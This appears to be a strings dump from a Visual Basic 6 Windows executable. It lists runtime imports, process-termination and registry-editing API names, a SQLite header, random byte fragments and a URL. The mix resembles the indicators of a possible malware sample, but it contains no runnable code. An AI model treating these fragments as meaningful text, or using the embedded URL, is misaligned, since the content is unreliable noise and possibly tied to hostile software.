Process32Next
PsCaRs
PsD;Ts
Qs0LRs6
Qs|5Ds
Qs6nTs
=Qsb>Rsi
Qs.kTs
Qso_Rs
QsqOQs
QsrkSs
Qs:_Rs
QsSuTsV
QsucRs
Qs"YSs
RegCloseKey
RegCreateKeyA
RegDeleteValueA
RegEnumKeyExA
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
RsA^Rs
RsdjRsK
RsQhRs
Rsq:Ts]
Rsr]Qs/
Rs__Rs
<Rs[rSs
RsUBRs{eRs
SQLite format 3
Ss+oRs
TerminateProcess
Then   
!This program cannot be run in DOS mode.
ujLk4aQOHk22kzBe6Eth
vb6chs.dll
VBA6.DLL
__vbaAryConstruct2
__vbaAryCopy
__vbaAryDestruct
__vbaAryLock
__vbaAryMove
__vbaAryUnlock
__vbaAryVar
__vbaBoolVarNull
__vbaCastObj
__vbaChkstk
__vbaCopyBytesZero
__vbaDateVar
__vbaEnd
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaFileClose
__vbaFileCloseAll
__vbaFileOpen
__vbaFPException
__vbaFpI4
__vbaFPInt
__vbaFpR8
__vbaFreeObj
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaGetOwner3
__vbaHresultCheckObj
__vbaI2I4
__vbaI2Var
__vbaI4Abs
__vbaI4Var
__vbaInStr
__vbaInStrVar
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLateMemSt
__vbaLbound
__vbaLenBstr
__vbaLenBstrB
__vbaLenVar
__vbaLsetFixstr
__vbaNew
__vbaNew2
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaPowerR8
__vbaPrintFile
__vbaPutOwner3
__vbaR4Str
__vbaR4Var
__vbaR8Sgn
__vbaR8Str
__vbaR8Var
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaRedim
__vbaRedimPreserve
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrComp
__vbaStrCopy
__vbaStrFixstr
__vbaStrI2
__vbaStrI4
__vbaStrMove
__vbaStrR8
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrUI1
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaUI1I4
__vbaUI1Var
__vbaVar2Vec
__vbaVarAnd
__vbaVarCat
__vbaVarCmpEq
__vbaVarCopy
__vbaVarDup
__vbaVarMove
__vbaVarSub
__vbaVarTstEq
__vbaVarTstGt
VL9aA6QsI3Nk65
WaitForSingleObject
Xn9R0Ekmiqabbt
Y0qzqd2xlLzp0erv2z44
z546Q6V3hJczB6T
?zhttp://ju.skoda-china.com/